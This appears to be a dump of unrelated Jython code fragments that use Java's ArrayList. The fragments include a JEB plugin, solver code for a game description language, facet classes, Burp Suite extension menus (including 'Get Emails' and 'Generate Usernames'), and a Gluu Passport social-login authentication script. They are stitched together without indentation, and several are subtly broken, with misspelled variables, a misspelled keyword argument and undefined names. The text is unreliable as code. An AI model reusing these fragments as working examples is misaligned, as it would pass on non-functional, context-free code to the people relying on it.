def run(self, ctx):
engctx = ctx.getEnginesContext()
if not engctx:
print('Back-end engines not initialized')
return
projects = engctx.getProjects()
if not projects:
print('There is no opened project')
return
# get the first unit available
units = RuntimeProjectUtil.findUnitsByType(projects[0], None, False)
if not units:
print('No unit available')
return
unit = units[0]
print('Unit: %s' % unit)
# retrieve the formatter, which is a producer of unit representations
formatter = unit.getFormatter()
# create an extra document (text document), wrap it in a representtion
lines = ArrayList()
lines.add(Line('There are two hard problems in computer science: cache invalidation, naming things, and off-by-one errors.'))
lines.add(Line(' - Phil Karlton (and others)'))
extraDoc = StaticTextDocument(lines)
extraPres = UnitRepresentationAdapter(100, 'Quotes', False, extraDoc)
# add the newly created representation to our unit, and notify clients
# the second argument indicates that the presentation should be persisted when saving the project
formatter.addPresentation(extraPres, True)
unit.notifyListeners(JebEvent(J.UnitChange));
def __init___1(self, parent, i):
""" generated source for method __init___1 """
super(IterationOrderCandidate, self).__init__()
# Shared rules:
self.varsToAssign = parent.varsToAssign
self.sourceConjunctCandidates = parent.sourceConjunctCandidates
self.sourceConjunctSizes = parent.sourceConjunctSizes
self.functionalSentences = parent.functionalSentences
self.functionalSentencesInfo = parent.functionalSentencesInfo
self.varDomainSizes = parent.varDomainSizes
# Individual rules:
self.sourceConjunctIndices = ArrayList(parent.sourceConjunctIndices)
self.varOrdering = ArrayList(parent.varOrdering)
self.functionalConjunctIndices = ArrayList(parent.functionalConjunctIndices)
self.varSources = ArrayList(parent.varSources)
# Add the new source conjunct
self.sourceConjunctIndices.add(i)
sourceConjunctCandidate = self.sourceConjunctCandidates.get(i)
varsFromConjunct = GdlUtils.getVariables(sourceConjunctCandidate)
# Ignore both previously added vars and duplicates
# Oh, but we need to be careful here, at some point.
# i.e., what if there are multiple of the same variable
# in a single statement?
# That should probably be handled later.
for var in varsFromConjunct:
if not self.varOrdering.contains(var):
self.varOrdering.add(var)
self.varSources.add(i)
self.functionalConjunctIndices.add(-1)
class FacetList:
def __init__(self, name, results):
self.__facetMap = HashMap()
self.__facetList = ArrayList()
facets = results.getFacets()
if facets is None:
return
facet = facets.get(name)
if facet is None:
return
facetData = facet.values()
for value in facetData.keySet():
count = facetData.get(value)
facet = Facet(name, value, count)
self.__facetMap.put(value, facet)
slash = value.rfind("/")
if slash == -1:
self.__facetList.add(facet)
else:
parent = self.__getFacet(value[:slash])
if parent is not None:
parent.addSubFacet(facet)
def __getFacet(self, name):
return self.__facetMap.get(name)
def getJsonList(self):
jsonList = ArrayList()
for facets in self.__facetList:
jsonList.add(facets.getJson())
return jsonList
class FacetList:
def __init__(self, name, json):
self.__facetMap = HashMap()
self.__facetList = ArrayList()
entries = json.getList("facet_counts/facet_fields/" + name)
for i in range(0, len(entries), 2):
value = entries[i]
count = entries[i+1]
if count > 0:
facet = Facet(name, value, count)
self.__facetMap.put(value, facet)
slash = value.rfind("/")
if slash == -1:
self.__facetList.add(facet)
else:
parent = self.__getFacet(value[:slash])
if parent is not None:
parent.addSubFacet(facet)
def __getFacet(self, name):
return self.__facetMap.get(name)
def getJsonList(self):
jsonList = ArrayList()
for facets in self.__facetList:
jsonList.add(facets.getJson())
return jsonList
def __getRvtNodes(self, manifest):
rvtNodes = ArrayList()
#print "manifest=%s" % manifest
for key in manifest.keySet():
package = False
node = manifest.get(key)
try:
# add the node
rvtNode = HashMap()
if node.get("hidden") != "True":
relPath = node.get("id")
# check if node is a package
if relPath:
package = (self.__getContentType(relPath) == "application/x-fascinator-package")
else:
relPath = key.replace("node", "blank")
rvtNode.put("visible", True)
rvtNode.put("title", node.get("title"))
if package:
subManifest = self.__readManifest(relPath)
if subManifest:
subManifest = subManifest.getJsonMap("manifest")
rvtNode.put("children", self.__getRvtNodes(subManifest))
relPath = key.replace("node", "package")
else:
rvtNode.put("children", self.__getRvtNodes(node.getJsonMap("children")))
rvtNode.put("relPath", relPath)
rvtNodes.add(rvtNode)
except Exception, e:
log.error("Failed to process node '%s': '%s'" % (node.toString(), str(e)))
def createMenuItems(self, invocation):
"""
Creates a context menu for beautifying and unbeautifying the request in editable message windows.
"""
if invocation.getToolFlag() not in [
IBurpExtenderCallbacks.TOOL_REPEATER, IBurpExtenderCallbacks.TOOL_PROXY,
IBurpExtenderCallbacks.TOOL_INTRUDER
]:
return
if invocation.getInvocationContext() != IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST:
return
menuItemList = ArrayList()
messageInfo = invocation.getSelectedMessages()[0]
requestBytes = messageInfo.getRequest()
requestInfo = self._helpers.analyzeRequest(requestBytes)
messageReference = self._getMessageReferenceFromBeautifyHeader(requestInfo, requestBytes)
if messageReference != -1:
def _unbeautifyClick(event):
self._restoreParameters(messageReference, messageInfo)
menuItemList.add(JMenuItem('Unbeautify Request', actionPerformed=_unbeautifyClick))
else:
self._messageReference += 1
def _beautifyClick(event):
self._simplifyParameters(self._messageReference, messageInfo)
menuItemList.add(JMenuItem('Beautify Request', actionPerformed=_beautifyClick))
return menuItemList
def pyValToJavaObj(val):
retObj = val
valtype = type(val)
if valtype is int:
retObj = Integer(val)
elif valtype is float:
retObj = Float(val)
elif valtype is long:
retObj = Long(val)
elif valtype is bool:
retObj = Boolean(val)
elif valtype is list:
retObj = ArrayList()
for i in val:
retObj.add(pyValToJavaObj(i))
elif valtype is tuple:
tempList = ArrayList()
for i in val:
tempList.add(pyValToJavaObj(i))
retObj = Collections.unmodifiableList(tempList)
elif issubclass(valtype, dict):
retObj = pyDictToJavaMap(val)
elif issubclass(valtype, JavaWrapperClass):
retObj = val.toJavaObj()
return retObj
def getSourceConjuncts(self):
""" generated source for method getSourceConjuncts """
# These are the selected source conjuncts, not just the candidates.
sourceConjuncts = ArrayList(len(self.sourceConjunctIndices))
for index in sourceConjunctIndices:
sourceConjuncts.add(self.sourceConjunctCandidates.get(index))
return sourceConjuncts
def getCondensationSet(cls, rule, model, checker, sentenceNameSource):
""" generated source for method getCondensationSet """
varsInRule = GdlUtils.getVariables(rule)
varsInHead = GdlUtils.getVariables(rule.getHead())
varsNotInHead = ArrayList(varsInRule)
varsNotInHead.removeAll(varsInHead)
for var in varsNotInHead:
ConcurrencyUtils.checkForInterruption()
for literal in rule.getBody():
if GdlUtils.getVariables(literal).contains(var):
minSet.add(literal)
for literal in minSet:
if isinstance(literal, (GdlRelation, )):
varsSupplied.addAll(GdlUtils.getVariables(literal))
elif isinstance(literal, (GdlDistinct, )) or isinstance(literal, (GdlNot, )):
varsNeeded.addAll(GdlUtils.getVariables(literal))
varsNeeded.removeAll(varsSupplied)
if not varsNeeded.isEmpty():
continue
for varNeeded in varsNeeded:
for literal in rule.getBody():
if isinstance(literal, (GdlRelation, )):
if GdlUtils.getVariables(literal).contains(varNeeded):
suppliers.add(literal)
candidateSuppliersList.add(suppliers)
for suppliers in candidateSuppliersList:
if Collections.disjoint(suppliers, literalsToAdd):
literalsToAdd.add(suppliers.iterator().next())
minSet.addAll(literalsToAdd)
if goodCondensationSetByHeuristic(minSet, rule, model, checker, sentenceNameSource):
return minSet
return None
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Wyslij do Bing", actionPerformed = self.bing_menu))
return manu_list
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Get Emails",actionPerformed=self.email_menu))
menu_list.add(JMenuItem("Generate Usernames",actionPerformed=self.users_menu))
return menu_list
def __init__(self, ):
self.__init__._super()
outer = VerticalPanel()
outer.add(self.getLoader())
result = VerticalPanel()
result.getElement().setId(u"friendsAreFriendsResult")
uids1 = ArrayList((Long),)
uids1.add(self.apiClient.getLoggedInUser())
uids1.add(Long(751836969))
uids1.add(Long(708775201))
uids2 = ArrayList((Long),)
uids2.add(Long(709281400))
uids2.add(Long(560635378))
uids2.add(Long(709281400))
class _anonymous(AsyncCallback):
@java.typed(Throwable)
def onFailure(self, caught):
self.handleFailure(caught)
@java.typed(List)
def onSuccess(self, friendInfoList):
outer.clear()
result.add(HTML(u"Size " + java.str(friendInfoList.size())))
for fi in friendInfoList:
result.add(HTML(java.str(java.str(FbName(fi.getUid1())) + u" friend with " + FbName(fi.getUid2())) + u" ? " + fi.getAreFriends()))
outer.add(result)
Xfbml.parse(result.getElement())
self.apiClient.friendsAreFriends(uids1, uids2, _anonymous())
self.initWidget(outer)
def makeNextAssignmentValid(self):
""" generated source for method makeNextAssignmentValid """
if self.nextAssignment == None:
return
# Something new that can pop up with functional constants...
i = 0
while i < len(self.nextAssignment):
if self.nextAssignment.get(i) == None:
# Some function doesn't agree with the answer here
# So what do we increment?
incrementIndex(self.plan.getIndicesToChangeWhenNull().get(i))
if self.nextAssignment == None:
return
i = -1
i += 1
# Find all the unsatisfied distincts
# Find the pair with the earliest var. that needs to be changed
varsToChange = ArrayList()
d = 0
while d < self.plan.getDistincts().size():
# The assignments must use the assignments implied by nextAssignment
if term1 == term2:
# need to change one of these
varsToChange.add(self.plan.getVarsToChangePerDistinct().get(d))
d += 1
if not varsToChange.isEmpty():
# We want just the one, as it is a full restriction on its
# own behalf
changeOneInNext(Collections.singleton(varToChange))
def __init___2(self, parent, functionalSentence, functionalSentenceIndex, functionOutput):
""" generated source for method __init___2 """
super(IterationOrderCandidate, self).__init__()
# Shared rules:
self.varsToAssign = parent.varsToAssign
self.sourceConjunctCandidates = parent.sourceConjunctCandidates
self.sourceConjunctSizes = parent.sourceConjunctSizes
self.functionalSentences = parent.functionalSentences
self.functionalSentencesInfo = parent.functionalSentencesInfo
self.varDomainSizes = parent.varDomainSizes
# Individual rules:
self.sourceConjunctIndices = ArrayList(parent.sourceConjunctIndices)
self.varOrdering = ArrayList(parent.varOrdering)
self.functionalConjunctIndices = ArrayList(parent.functionalConjunctIndices)
self.varSources = ArrayList(parent.varSources)
# And we add the function
varsInFunction = GdlUtils.getVariables(functionalSentence)
# First, add the remaining arguments
for var in varsInFunction:
if not self.varOrdering.contains(var) and not var == functionOutput and self.varsToAssign.contains(var):
self.varOrdering.add(var)
self.functionalConjunctIndices.add(-1)
self.varSources.add(-1)
# Then the output
self.varOrdering.add(functionOutput)
self.functionalConjunctIndices.add(functionalSentenceIndex)
self.varSources.add(-1)
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Utworz liste slow", actionpreformed = self.wordlist_menu))
return menu_list
def getChildren(self, analyticFunctionOrdering):
""" generated source for method getChildren """
allChildren = ArrayList()
allChildren.addAll(getSourceConjunctChildren())
allChildren.addAll(getFunctionAddedChildren(analyticFunctionOrdering))
# print "Number of children being added: " + len(allChildren);
return allChildren
def getVariableNames(cls, gdl):
""" generated source for method getVariableNames """
variables = cls.getVariables(gdl)
variableNames = ArrayList()
for variable in variables:
variableNames.add(variable.__name__)
return variableNames
def createMenuItems(self, context_menu):
self.context = context_menu
menu_list = ArrayList()
menu_list.add(JMenuItem("Create Wordlist",
actionPerformed=self.wordlist_menu))
return menu_list
class Facet:
def __init__(self, key, value, count):
self.__key = key
self.__value = URLEncoder.encode(value, "UTF-8")
self.__count = count
self.__subFacets = ArrayList()
def getName(self):
name = URLDecoder.decode(self.__value, "UTF-8")
slash = name.rfind("/")
return name[slash+1:]
def getKey(self):
return self.__key
def getValue(self):
return self.__value
def getCount(self):
return self.__count
def addSubFacet(self, facet):
self.__subFacets.add(facet)
def getSubFacets(self):
return self.__subFacets
def getFacetQuery(self):
return '%s:"%s"' % (self.__key, self.__value)
def getId(self):
return md5.new(URLDecoder.decode(self.getFacetQuery(), "UTF-8")).hexdigest()
def resolve(self, s):
from pysonarsq.java.Binder import Binder
from pysonarsq.java.Binding import Binding
from pysonarsq.java.Analyzer import Analyzer
classType = ClassType(self.getName().id, s)
baseTypes = ArrayList()
for base in self.bases:
baseType = self.resolveExpr(base, s);
if baseType.isClassType():
classType.addSuper(baseType)
elif baseType.isUnionType():
for b in baseType.asUnionType().getTypes():
classType.addSuper(b)
break
else:
Analyzer.self.putProblem(base, str(base) + " is not a class")
baseTypes.append(baseType)
# XXX: Not sure if we should add "bases", "name" and "dict" here. They
# must be added _somewhere_ but I'm just not sure if it should be HERE.
builtins = Analyzer.self.builtins
self.addSpecialAttribute(classType.getTable(), "__bases__", TupleType(baseTypes))
self.addSpecialAttribute(classType.getTable(), "__name__", builtins.BaseStr)
self.addSpecialAttribute(classType.getTable(), "__dict__", DictType(builtins.BaseStr, Analyzer.self.builtins.unknown))
self.addSpecialAttribute(classType.getTable(), "__module__", builtins.BaseStr)
self.addSpecialAttribute(classType.getTable(), "__doc__", builtins.BaseStr)
# Bind ClassType to name here before resolving the body because the
# methods need this type as self.
Binder.bind(s, self.name, classType, Binding.Kind.CLASS)
self.resolveExpr(self.body, classType.getTable())
return Analyzer.self.builtins.Cont
def getProps(self, ps, imageCache, f, nature, editor, offset):
'''java: List<ICompletionProposal> getProps(PySelection ps, ImageCache imageCache, File f,
IPythonNature nature, PyEdit edit, int offset)
'''
IPyCompletionProposal = editor.getIPyCompletionProposalClass() #@UnresolvedImport
PyCompletionProposal = editor.getPyCompletionProposalClass() #@UnresolvedImport
UIConstants = editor.getUIConstantsClass() #@UnresolvedImport
#=======================================================================================================================
# Prop
#=======================================================================================================================
class Prop(PyCompletionProposal):
'''This is the proposal that Ctrl+1 will require
'''
def __init__(self, assignToAttribsOfSelf, *args):
PyCompletionProposal.__init__(self, *args)
self.assignToAttribsOfSelf = assignToAttribsOfSelf
def apply(self, document):
'''java: public void apply(IDocument document)
'''
self.assignToAttribsOfSelf.run()
def getSelection(self, document):
return None
from java.util import ArrayList
l = ArrayList();
l.add(Prop(self.assignToAttribsOfSelf, '', 0, 0, 0, self.getImage(imageCache, UIConstants.ASSIST_DOCSTRING),
"Assign parameters to attributes", None, None, IPyCompletionProposal.PRIORITY_DEFAULT));
return l
def core(imp):
pntsA = parsePoints(imp)
# Points must be passed to the Clusterer in Java List of Clusterable.
pntsAL = ArrayList()
for apnt in pntsA:
pntsAL.add(PosWrap(apnt[0], apnt[1], apnt[2]))
awrap = pntsAL.get(0)
pp = awrap.getPoint()
#print pp
clusterer = KMeansPlusPlusClusterer(Number_of_Cluster, Iteration)
res = clusterer.cluster(pntsAL)
outimp = imp.duplicate()
for i in range(res.size()):
if Verbose:
IJ.log('Cluster: ' + str(i))
for apnt in res.get(i).getPoints():
xpos = apnt.getPoint()[0]
ypos = apnt.getPoint()[1]
zpos = apnt.getPoint()[2]
if Verbose:
IJ.log('... ' + str(xpos) + ', ' + str(ypos) + ', ' + str(zpos))
outimp.getStack().getProcessor(int(zpos)+1).putPixel(int(xpos), int(ypos), i+1)
return outimp
def __getRvtNodes(self, manifest):
rvtNodes = ArrayList()
#print "manifest=%s" % manifest
for node in manifest:
package = False
try:
# add the node
rvtNode = HashMap()
if not node.getHidden():
oid = node.getId()
# check if node is a package
if oid != "blank":
package = (self.__getContentType(oid) == "application/x-fascinator-package")
else:
oid = node.getKey().replace("node", "blank")
rvtNode.put("visible", True)
rvtNode.put("title", node.getTitle())
if package:
subManifest = self.__readManifest(oid)
if subManifest is not None:
rvtNode.put("children", self.__getRvtNodes(subManifest.getTopNodes()))
oid = node.getKey().replace("node", "package")
else:
rvtNode.put("children", self.__getRvtNodes(node.getChildren()))
rvtNode.put("relPath", oid)
rvtNodes.add(rvtNode)
except Exception, e:
self.log.error("Failed to process node '%s': '%s'" % (node.toString(), str(e)))
def _sbi_list_arraylist(list):
"""convert a python list to an arraylist. subroutine for
_sub_build_intentions_icl"""
al = ArrayList()
for el in list:
al.add(el)
return al
def test_ArrayList(self):
"""create ArrayList in JVM (from the JavaSet)
"""
arrayList = ArrayList(self.javaList)
# print "created ArrayList:", arrayList, type(arrayList)
self.assertEqual(self.javaList.size(), arrayList.size(),
"ArrayList has same size")
elem0 = arrayList.get(0)
elem1 = arrayList.get(1)
self.assertEqual(0, arrayList.indexOf(elem0), "same index position")
self.assertEqual(1, arrayList.indexOf(elem1), "same index position")
listElem0 = self.testList[0]
listElem1 = self.testList[1]
_type = self._primitive_types.get(elem0.getClass())
if _type is not None:
elem0 = _type.class_.cast(elem0)
elem1 = _type.class_.cast(elem1)
self.assertEqual(elem0, listElem0,
"should be equal: %s (%s) <-> %s (%s)" % (
elem0, type(elem0), listElem0, type(listElem0)))
self.assertEqual(elem1, listElem1,
"should be equal: %s (%s) <-> %s (%s)" % (
elem1, type(elem1), listElem1, type(listElem1)))
self.assertEqual(type(elem0), type(listElem0),
"should have same type: %s <-> %s" % (
type(elem0), type(listElem0)))
self.assertNotEqual(elem0, elem1,
"ArrayList: first element must NOT equal second element")
def readCSV(filepath): reader = CSVReader(FileReader(filepath), ",") ls = reader.readAll() data = ArrayList() for item in ls: data.add(item) return data
class Facet:
def __init__(self, key, value, count):
self.__name = value[value.rfind("/") + 1:]
fq = '%s:"%s"' % (key, value)
self.__facetQuery = URLEncoder.encode(fq, "UTF-8")
self.__id = md5.new(fq).hexdigest()
self.__count = count
self.__subFacets = ArrayList()
def getId(self):
return self.__id
def getName(self):
return self.__name
def getCount(self):
return self.__count
def getFacetQuery(self):
return self.__facetQuery
def addSubFacet(self, facet):
self.__subFacets.add(facet)
def getSubFacets(self):
return self.__subFacets
def __init__(self, plan):
""" generated source for method __init__ """
super(AssignmentIteratorImpl, self).__init__()
self.plan = plan
# TODO: Handle this case with a separate class
if plan.getVarsToAssign() == None:
self.headOnly = True
return
# Set up source tuple...
self.sourceTupleIndices = ArrayList(plan.getTuplesBySource().size())
i = 0
while i < plan.getTuplesBySource().size():
self.sourceTupleIndices.add(0)
i += 1
# Set up...
self.valueIndices = ArrayList(plan.getVarsToAssign().size())
i = 0
while i < plan.getVarsToAssign().size():
self.valueIndices.add(0)
self.nextAssignment.add(None)
i += 1
self.assignmentMap.putAll(plan.getHeadAssignment())
# Update "nextAssignment" according to the values of the
# value indices
updateNextAssignment()
# Keep updating it until something really works
makeNextAssignmentValid()
def getMethodArgNames(self, moduleName, className, methodName):
from java.util import ArrayList
args = self.getMethodArgs(moduleName, className, methodName)
argList = ArrayList()
for a in args:
argList.add(a)
return argList
class Styler(DefaultNodeVisitor):
""" generated source for class Styler """
BUILTIN = re.compile("None|True|False|NotImplemented|Ellipsis|__debug__")
#
# * Matches the start of a triple-quote string.
#
TRISTRING_PREFIX = re.compile("^[ruRU]{0,2}['\"]{3}")
#linker = Linker()
#
# * Offsets of doc strings found by node visitor.
#
docOffsets = HashSet()
def __init__(self, idx, linker):
""" generated source for method __init__ """
super(Styler, self).__init__()
self.analyzer = idx
self.styles = ArrayList()
self.linker = linker
self.path = None
self.source = None
#
# * Entry point for decorating a source file.
# *
# * @param path absolute file path
# * @param src file contents
#
def addStyles(self, path, src):
""" generated source for method addStyles """
self.path = path
self.source = src
m = self.analyzer.getAstForFile(path)
if m is not None:
m.visit(self)
self.styles = sorted(self.styles, lambda a,b: a.compareTo(b))
return self.styles
#@overloaded
def visit(self, n):
if isinstance(n, Num):
self.addStyle(n, StyleRun.Type.NUMBER)
return True
if isinstance(n, Str):
s = self.sourceString(n.start, n.end)
#if self.TRISTRING_PREFIX.match(s).lookingAt():
if self.TRISTRING_PREFIX.match(s) is not None:
self.addStyle(n.start, n.end - n.start, StyleRun.Type.DOC_STRING)
self.docOffsets.add(n.start)
# don't re-highlight as a string
# highlightDocString(n);
return True
if isinstance(n, Name):
parent = n.getParent()
if isinstance(parent, (FunctionDef, )):
fn = parent;
if n == fn.name:
self.addStyle(n, StyleRun.Type.FUNCTION)
elif n == fn.kwarg or n == fn.vararg:
self.addStyle(n, StyleRun.Type.PARAMETER)
return True
if self.BUILTIN.match(n.id) is not None:
self.addStyle(n, StyleRun.Type.BUILTIN)
return True
return True
def addStyle(self, *args):
if len(args) == 4:
self.addStyle1(*args)
elif len(args) == 2:
self.addStyle2(*args)
elif len(args) == 3:
self.addStyle3(*args)
#@overloaded
def addStyle1(self, e, start, len, type_):
if e.getFile() is not None:
# if it's an NUrl, for instance
self.addStyle(start, len, type_)
#@addStyle.register(object, Node, StyleRun.Type)
def addStyle2(self, e, type_):
if e.start is not None and e.end is not None:
self.addStyle(e, e.start, e.end - e.start, type_)
#@addStyle.register(object, int, int, StyleRun.Type)
def addStyle3(self, begin, len, type_):
self.styles.append(StyleRun(type_, begin, len))
def sourceString(self, *args):
if len(args) == 1:
return self.sourceString0(*args)
else:
return self.sourceString1(*args)
#@overloaded
def sourceString0(self, e):
""" generated source for method sourceString """
return self.sourceString(e.start, e.end)
#@sourceString.register(object, int, int)
def sourceString1(self, begin, end):
""" generated source for method sourceString_0 """
a = max(begin, 0)
b = min(end, len(self.source))
b = max(b, 0)
try:
return self.source[a, b]
except Exception as sx:
# Silent here, only happens for weird encodings in file
return ""
def getLoadedFiles(self):
files = ArrayList()
for file_ in self.loadedFiles:
if file_.endswith(".py"):
files.append(file_)
return files
def getDiagnosticsForFile(self, file_):
errs = self.semanticErrors.get(file_)
if errs is not None:
return errs
return ArrayList()
def getJavaList(self):
javaList = ArrayList()
javaList.add("one")
javaList.add(2)
javaList.add("three")
javaList.add(4)
javaList.add("five")
return javaList
def __init__(self):
self.position = PVector(width/2, height/2)
self.velocity = PVector()
self.acceleration = PVector()
self.history = ArrayList()
self.noff = PVector(random(1000), random(1000))
def makeNullResponse(self):
response = ArrayList()
return response
def mergeFromJava(siteId, activeTable, newRecords, logger, mode, offsetSecs=0):
perfStat.log(
"mergeFromJava called for site: %s, activeTable: %d , newRecords: %d" %
(siteId, activeTable.size(), newRecords.size()))
timer = TimeUtil.getTimer()
timer.start()
pyActive = []
szActive = activeTable.size()
for i in range(szActive):
pyActive.append(
ActiveTableRecord.ActiveTableRecord(activeTable.get(i),
"Previous"))
pyNew = []
szNew = newRecords.size()
for i in range(szNew):
rec = ActiveTableRecord.ActiveTableRecord(newRecords.get(i))
pyNew.append(rec)
active = ActiveTable(mode, logger)
logger.info("Updating " + mode + " Active Table: new records\n" +
active.printActiveTable(pyNew, combine=1))
timer.stop()
perfStat.logDuration("mergeFromJava preprocess", timer.getElapsedTime())
updatedTable, purgeRecords, changes, changedFlag = active.activeTableMerge(
pyActive, pyNew, offsetSecs)
perfStat.log(
"mergeFromJava activeTableMerge returned updateTable: %d, purgeRecords: %d, changes: %d"
% (len(updatedTable), len(purgeRecords), len(changes)))
timer.reset()
timer.start()
logger.info("Updated " + mode + " Active Table: purged\n" +
active.printActiveTable(purgeRecords, combine=1))
stateDict = {}
for r in updatedTable:
recs = stateDict.get(r['state'], [])
recs.append(r)
stateDict[r['state']] = recs
keys = stateDict.keys()
keys.sort()
for key in keys:
if key == "Previous":
continue
logger.info("Updated " + mode + " Active Table: " + key + "\n" +
active.printActiveTable(stateDict[key], combine=1))
updatedList = ArrayList(len(updatedTable))
for r in updatedTable:
if r['state'] not in ["Previous", "Replaced"]:
updatedList.add(r.javaRecord())
purgedList = ArrayList(len(purgeRecords))
for r in purgeRecords:
purgedList.add(r.javaRecord())
changeList = ArrayList(len(changes))
if (changedFlag):
from com.raytheon.uf.common.activetable import VTECChange
for c in changes:
changeList.add(VTECChange(c[0], c[1], c[2], c[3]))
from com.raytheon.uf.common.activetable import MergeResult
result = MergeResult(updatedList, purgedList, changeList)
timer.stop()
perfStat.logDuration("mergeFromJava postprocess", timer.getElapsedTime())
return result
def attemptAuthentication(self, identity, user_profile, user_profile_json):
uidKey = "uid"
if not self.checkRequiredAttributes(user_profile, [uidKey, self.providerKey]):
return False
provider = user_profile[self.providerKey]
if not provider in self.registeredProviders:
print "Passport-social. attemptAuthentication. Identity Provider %s not recognized" % provider
return False
#else:
# TODO - HANDLE ISSUER NOT SET
# self.registeredProviders[provider]["samlissuer"] == None
uid = user_profile[uidKey][0]
externalUid = "passport-%s:%s" % (provider, uid)
# PERSISTENT_ID - generate the persistentId for the RP if coming from SAML (entityId parameter is set)
sessionId = identity.getSessionId()
sessionAttributes = sessionId.getSessionAttributes()
newPersistentIdSamlRp = sessionAttributes.get("spNameQualifier")
switchFlowStatus = sessionAttributes.get("switchFlowStatus")
mfaFlowStatus = sessionAttributes.get("mfaFlowStatus")
# SWITCH - do NOT generate a new persistentId if the switch flow is being executed
if ( newPersistentIdSamlRp != None and StringHelper.isNotEmptyString(newPersistentIdSamlRp) and switchFlowStatus == None and mfaFlowStatus != "MFA_2_IN_PROGRESS"):
# PERSISTENT_ID - generate the persistentId for the RP in case there is no further processing/collection happening
newPersistentIdIdp = self.registeredProviders[provider]["samlissuer"]
newPersistentIdUid = "sic" + uuid.uuid4().hex
user_profile["persistentId"][0] = '%s|%s|%s' % (newPersistentIdSamlRp, newPersistentIdIdp, newPersistentIdUid )
else:
user_profile.pop("persistentId")
if ( user_profile["claims"] != None ):
# DISTRIBUTED CLAIMS - save the access token and the userInfo URL
claimsReturn = user_profile["claims"]
print "Passport-social. attemptAuthentication. Claims '%s'" % claimsReturn
print "Passport-social. attemptAuthentication. Looking for user with oxExternalUid = '%s'" % externalUid
userService = CdiUtil.bean(UserService)
userByUid = userService.getUserByAttribute("oxExternalUid", externalUid)
# MFA - if MFA is in progress, make sure UID matches the previous one
if ( provider == "mfa" and sessionAttributes.get("mfaFlowStatus") == "MFA_2_IN_PROGRESS" ):
# get the MFA PAI from the external UID
if ( userByUid == None ):
# the MFA authenticated user is not the same user
print "Passport-social. attemptAuthentication. ERROR for MFA - MFA user cannot be found"
return False
elif ( userByUid.getUserId() != sessionAttributes.get("authenticatedUser") ):
# the MFA authenticated user is not the same user
print "Passport-social. attemptAuthentication. ERROR for MFA - The original and MFA users do not match"
return False
email = None
if "mail" in user_profile:
email = user_profile["mail"]
if len(email) == 0:
email = None
else:
email = email[0]
user_profile["mail"] = [ email ]
if email == None and self.registeredProviders[provider]["requestForEmail"]:
print "Passport-social. attemptAuthentication. Email was not received"
if userByUid != None:
# This avoids asking for the email over every login attempt
email = userByUid.getAttribute("mail")
if email != None:
print "Passport-social. attemptAuthentication. Filling missing email value with %s" % email
user_profile["mail"] = [ email ]
if email == None:
# Store user profile in session and abort this routine
identity.setWorkingParameter("passport_user_profile", user_profile_json)
return True
userByMail = None if email == None else userService.getUserByAttribute("mail", email)
# Determine if we should add entry, update existing, or deny access
doUpdate = False
doAdd = False
if userByUid != None:
print "User with externalUid '%s' already exists" % externalUid
if userByMail == None:
doUpdate = True
else:
if userByMail.getUserId() == userByUid.getUserId():
doUpdate = True
else:
print "Users with externalUid '%s' and mail '%s' are different. Access will be denied. Impersonation attempt?" % (externalUid, email)
self.setMessageError(FacesMessage.SEVERITY_ERROR, "Email value corresponds to an already existing provisioned account")
else:
if userByMail == None:
doAdd = True
elif self.registeredProviders[provider]["emailLinkingSafe"]:
tmpList = userByMail.getAttributeValues("oxExternalUid")
tmpList = ArrayList() if tmpList == None else ArrayList(tmpList)
tmpList.add(externalUid)
userByMail.setAttribute("oxExternalUid", tmpList)
userByUid = userByMail
print "External user supplying mail %s will be linked to existing account '%s'" % (email, userByMail.getUserId())
doUpdate = True
else:
print "An attempt to supply an email of an existing user was made. Turn on 'emailLinkingSafe' if you want to enable linking"
self.setMessageError(FacesMessage.SEVERITY_ERROR, "Email value corresponds to an already existing account. If you already have a username and password use those instead of an external authentication site to get access.")
# MFA - if MFA is REQUIRED generate the MFA PAI for the second pass
if ( provider != "mfa" and sessionAttributes.get("mfaFlowStatus") == "MFA_1_REQUIRED" ):
# generate a new MFA PAI in case there is none in the user profile
user_profile[ "oxExternalUid_newMfa" ] = [ "passport-mfa:" + "mfa" + uuid.uuid4().hex ]
username = None
try:
if doUpdate:
username = userByUid.getUserId()
print "Passport-social. attemptAuthentication. Updating user %s" % username
self.updateUser(userByUid, user_profile, userService)
elif doAdd:
print "Passport-social. attemptAuthentication. Creating user %s" % externalUid
user_profile[uidKey][0] = uuid.uuid4().hex
newUser = self.addUser(externalUid, user_profile, userService)
username = newUser.getUserId()
except:
print "Exception: ", sys.exc_info()[1]
print "Passport-social. attemptAuthentication. Authentication failed"
return False
if username == None:
print "Passport-social. attemptAuthentication. Authentication attempt was rejected"
return False
else:
logged_in = CdiUtil.bean(AuthenticationService).authenticate(username)
print "Passport-social. attemptAuthentication. Authentication for %s returned %s" % (username, logged_in)
if ( logged_in == True ):
# Save the authenticated data
sessionAttributes.put("authenticatedProvider", "passport_social:" + provider)
sessionAttributes.put("authenticatedUser", username)
# SWITCH - Save contextual data for the switch flows
if (switchFlowStatus == "1_GET_SOURCE"):
print "Passport-social. attemptAuthentication. SWITCH FLOW: Setting SOURCE provider to %s" % sessionAttributes.get("authenticatedProvider")
sessionAttributes.put( "switchSourceAuthenticatedProvider", sessionAttributes.get("authenticatedProvider") )
sessionAttributes.put( "switchSourceAuthenticatedUser", username)
elif (switchFlowStatus == "2_GET_TARGET"):
print "Passport-social. attemptAuthentication. SWITCH FLOW: Setting TARGET provider to %s" % sessionAttributes.get("authenticatedProvider")
sessionAttributes.put("switchTargetAuthenticatedProvider", sessionAttributes.get("authenticatedProvider") )
sessionAttributes.put("switchTargetAuthenticatedUser", username)
elif (mfaFlowStatus == "MFA_1_REQUIRED"):
print "Passport-social. attemptAuthentication. MFA FLOW: starting flow marking status = MFA_2_IN_PROGRESS"
sessionAttributes.put("mfaFlowStatus", "MFA_2_IN_PROGRESS" )
identity.setWorkingParameter("selectedProvider", "mfa")
elif ( mfaFlowStatus == "MFA_2_IN_PROGRESS" ):
print "Passport-social. attemptAuthentication. MFA FLOW: Marking flow as complete"
sessionAttributes.put("mfaFlowStatus", "MFA_3_COMPLETE" )
elif ( mfaFlowStatus == "MFA_2_IN_PROGRESS" ):
print "Passport-social. attemptAuthentication. MFA FLOW: Marking flow as FAILED"
sessionAttributes.put("mfaFlowStatus", "MFA_3_FAILED" )
## SESSION_SAFE - update
